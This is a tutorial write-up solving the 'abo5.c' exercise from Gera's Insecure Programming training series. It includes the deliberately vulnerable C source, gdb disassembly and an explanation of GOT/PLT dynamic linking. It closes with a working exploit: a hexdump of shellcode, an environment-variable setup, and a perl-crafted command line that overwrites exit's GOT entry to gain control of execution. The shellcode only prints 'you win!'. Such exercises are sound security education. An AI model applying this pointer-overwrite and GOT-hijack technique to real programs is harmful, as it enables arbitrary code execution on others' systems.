Introduction
I actually solved this one a bit ago, while messing around at the GFIRST 2010 conference in San Antonio. Just now getting around to writing it up.
Here is the code for abo5.c:
Gera says: ch-ch-ch-changes
/* abo5.c *
* specially crafted to feed your brain by gera@core-sdi.com */
/* You take the blue pill, you wake up in your bed, *
* and you believe what you want to believe *
* You take the red pill, *
* and I'll show you how deep goes the rabbit hole */
int main(int argv,char **argc) {
char *pbuf=malloc(strlen(argc[2])+1);
char buf[256];
strcpy(buf,argc[1]);
for (;*pbuf++=*(argc[2]++););
exit(1);
}
Use your sixth sense, will you be able to gain control given the possibility of writing wherever you wish in memory?
As you can see, this is very similar code to the abo4.c exercise. Gera’s words are the keys to this exercise…as is often the case he’s given us a clue. We know very well from our previous trials and tribulations with abo4.c that by overflowing the pointer address of pbuf on the stack, we can essentially control 4-bytes of data at an arbitrary writeable location in the memory of the running process. This ends up being the key to successful exploitation of this code snippet.
Disassembly
Let’s take a look at the disassembled code, with the important bits highlighted.
(gdb) disassemble main Dump of assembler code for function main: 0x08048414 <main+0>: push ebp 0x08048415 <main+1>: mov ebp,esp 0x08048417 <main+3>: sub esp,0x128 0x0804841d <main+9>: and esp,0xfffffff0 0x08048420 <main+12>: mov eax,0x0 0x08048425 <main+17>: sub esp,eax 0x08048427 <main+19>: mov eax,DWORD PTR [ebp+12] 0x0804842a <main+22>: add eax,0x8 0x0804842d <main+25>: mov eax,DWORD PTR [eax] 0x0804842f <main+27>: mov DWORD PTR [esp],eax 0x08048432 <main+30>: call 0x804830c <strlen@plt> 0x08048437 <main+35>: inc eax 0x08048438 <main+36>: mov DWORD PTR [esp],eax 0x0804843b <main+39>: call 0x804832c <malloc@plt> 0x08048440 <main+44>: mov DWORD PTR [ebp-12],eax 0x08048443 <main+47>: mov eax,DWORD PTR [ebp+12] 0x08048446 <main+50>: add eax,0x4 0x08048449 <main+53>: mov eax,DWORD PTR [eax] 0x0804844b <main+55>: mov DWORD PTR [esp+4],eax 0x0804844f <main+59>: lea eax,[ebp-0x118] 0x08048455 <main+65>: mov DWORD PTR [esp],eax 0x08048458 <main+68>: call 0x804831c <strcpy@plt> 0x0804845d <main+73>: mov eax,DWORD PTR [ebp-12] 0x08048460 <main+76>: mov ecx,eax 0x08048462 <main+78>: mov eax,DWORD PTR [ebp+12] 0x08048465 <main+81>: add eax,0x8 0x08048468 <main+84>: mov edx,DWORD PTR [eax] 0x0804846a <main+86>: movzx edx,BYTE PTR [edx] 0x0804846d <main+89>: inc DWORD PTR [eax] 0x0804846f <main+91>: mov BYTE PTR [ecx],dl 0x08048471 <main+93>: lea eax,[ebp-12] 0x08048474 <main+96>: inc DWORD PTR [eax] 0x08048476 <main+98>: test dl,dl 0x08048478 <main+100>: jne 0x804845d <main+73> 0x0804847a <main+102>: mov DWORD PTR [esp],0x1 0x08048481 <main+109>: call 0x804833c <exit@plt> End of assembler dump.
The first highlighted line contains the call to
strcpy that will overwrite the pointer value with the value presented as argv[2] or the second command line argument. The bit in between the first and second highlighted line is the implementation of the for loop that overwrites *pbuf with the value in argv[2], and the second highlighted line is the call to exit. As you can see in the disassembly and when reviewing the source, this code is slightly different from the previous pointer-overwrite exercise, in that there is no call to the pointer afterward. So we can’t control execution in that manner. We could do a saved return address overwrite, since we essentially have control over a single DWORD in writeable memory (the stack being a writeable memory location of course) but unfortunately there is a pesky call to exit that will prevent us from using that method.
Actually if you’ve taken a look, you’ve realized that pretty much the only thing that happens after we overwrite the pointer value is a call to exit. Hmm…how can we use this to our advantage? Well first, you’ll note that the call to the exit routine is actually not as clear cut as it seems. It’s actually a call to a pointer in memory…perhaps we can control this call location?
Dynamic Linking
The reason that this call is exploitable is because the program is dynamically linked. The gist of the meaning of dynamic linking is essentially the ability of a program to be compiled with references to external functions (functions that exist in some header file which has been compiled somewhere, for instance stdio.h and the printf) which are resolved at run time or load time (linking and loading being beyond the scope of this article and indeed my knowledge), sometimes you may hear it referred to as run time linking for that reason. This is what .dll files on Windows are for, and .so files on Linux and UNIX. Essentially, they contain functions that might be useful to have on the system, or functions that are specified to be available by the C or C++ standards, and allows them to be shared among multiple external programs without the need to directly compile them inline into the code. This provides a few advantages, off the top of my head the most obvious ones being you can change the code in a commonly used function only once to fix a bug and it propagates to a bunch of other code automatically, and that you reduce the compiled size and complexity of a given code base. In all of these operating systems that use dynamic linking there is some sort of a look up table that allows programs to resolved run time linked functions, in Linux and UNIX this look up table is called the GOT, or Global Offset Table and it works in close conjunction with another structure called the Procedure Linkage Table or PLT.
Taking a Look Under the Hood
There is a lot of documentation to be found describing the structure and implementation of the GOT and PLT on Linux machines, and I’ve included some that I’ve found useful at the end of this post. In this case, I think I’d rather just take a look at the assembly and let that point us in the right direction. Honestly, so long as you understand that you can write an arbitrary 4-byte value anywhere you want to (that is writeable and won’t produce a segfault) you can reason out what to do here without knowing much or at all about the GOT or PLT.
Let’s step through the call to exit and see what we find.
0x08048481 <main+109>: call 0x804833c <exit@plt> End of assembler dump. (gdb) x/i 0x804833c 0x804833c <exit@plt>: jmp DWORD PTR ds:0x8049668 (gdb) x/xw 0x8049668 0x8049668 <_GLOBAL_OFFSET_TABLE_+32>: 0x08048342
First we’ve got displayed the call to
0x804833c, which is the location of exit in the aforementioned PLT. So we’ll examine the instruction at that address, which is essentially an unconditional jump to the address contained in a pointer. This pointer, as you can see from the results of the final command we ran, is in the GOT, and contains the value 0x08048342. If we were to overwrite that value with some shellcode on the stack, we’ll have control of execution. Here is what that would look like.
First we’ll determine the distance between the address of buf and pbuf on the stack.
(gdb) break 1
Breakpoint 2 at 0x8048414: file abo5.c, line 1.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo5 one two
Breakpoint 2, main (argv=134513684, argc=0x3) at abo5.c:9
9 int main(int argv,char **argc) {
(gdb) x/x &buf
0xbffff730: 0x0804819c
(gdb) x/x &pbuf
0xbffff83c: 0xb8000ff4
(gdb) print/d 0xbffff83c - 0xbffff730
$4 = 268
Then we’ll do our at-this-point-very-common magic with the shellcode we’ve been using all along, the address on the GOT for
exit, the getenvaddr.c code that was generously provided by Hacking: The Art of Exploitation, and all the rest.hacking@hacking-theart:~/InsecureProgramming $ hexdump -C print_youwin_shellcode 00000000 eb 13 59 31 c0 b0 04 31 db 43 31 d2 b2 0a cd 80 |..Y1...1.C1.....| 00000010 b0 01 4b cd 80 e8 e8 ff ff ff 79 6f 75 20 77 69 |..K.......you wi| 00000020 6e 21 0a 0d |n!..| 00000024 hacking@hacking-theart:~/InsecureProgramming $ export SHELLCODE=$(cat print_youwin_shellcode) hacking@hacking-theart:~/InsecureProgramming $ echo $SHELLCODE ?Y1??1?C1? ??K??????you win! hacking@hacking-theart:~/InsecureProgramming $ ./getenvaddr SHELLCODE ./abo5 SHELLCODE will be at 0xbffff9ec hacking@hacking-theart:~/InsecureProgramming $ ./abo5 $(perl -e 'print "A" x 268 . "\x68\x96\x04\x08";') $(perl -e 'print "\xec\xf9\xff\xbf";') you win!
There we go, that’s all for now
.
References
I didn’t really use these references to develop this post, but in perusing them I thought they’d be useful for someone wanting a bit more in-depth explanation of some of the concepts in here.
Executable and Linking Format (ELF) by unknown author, Tool Interface Standards, Portable Formats Specification, Ver 1.1
Dynamic Linking in Linux and Windows by Reji Thomas and Bhasker Reddy, Symantec
Understanding Memory by University of Alberta AICT Research and Support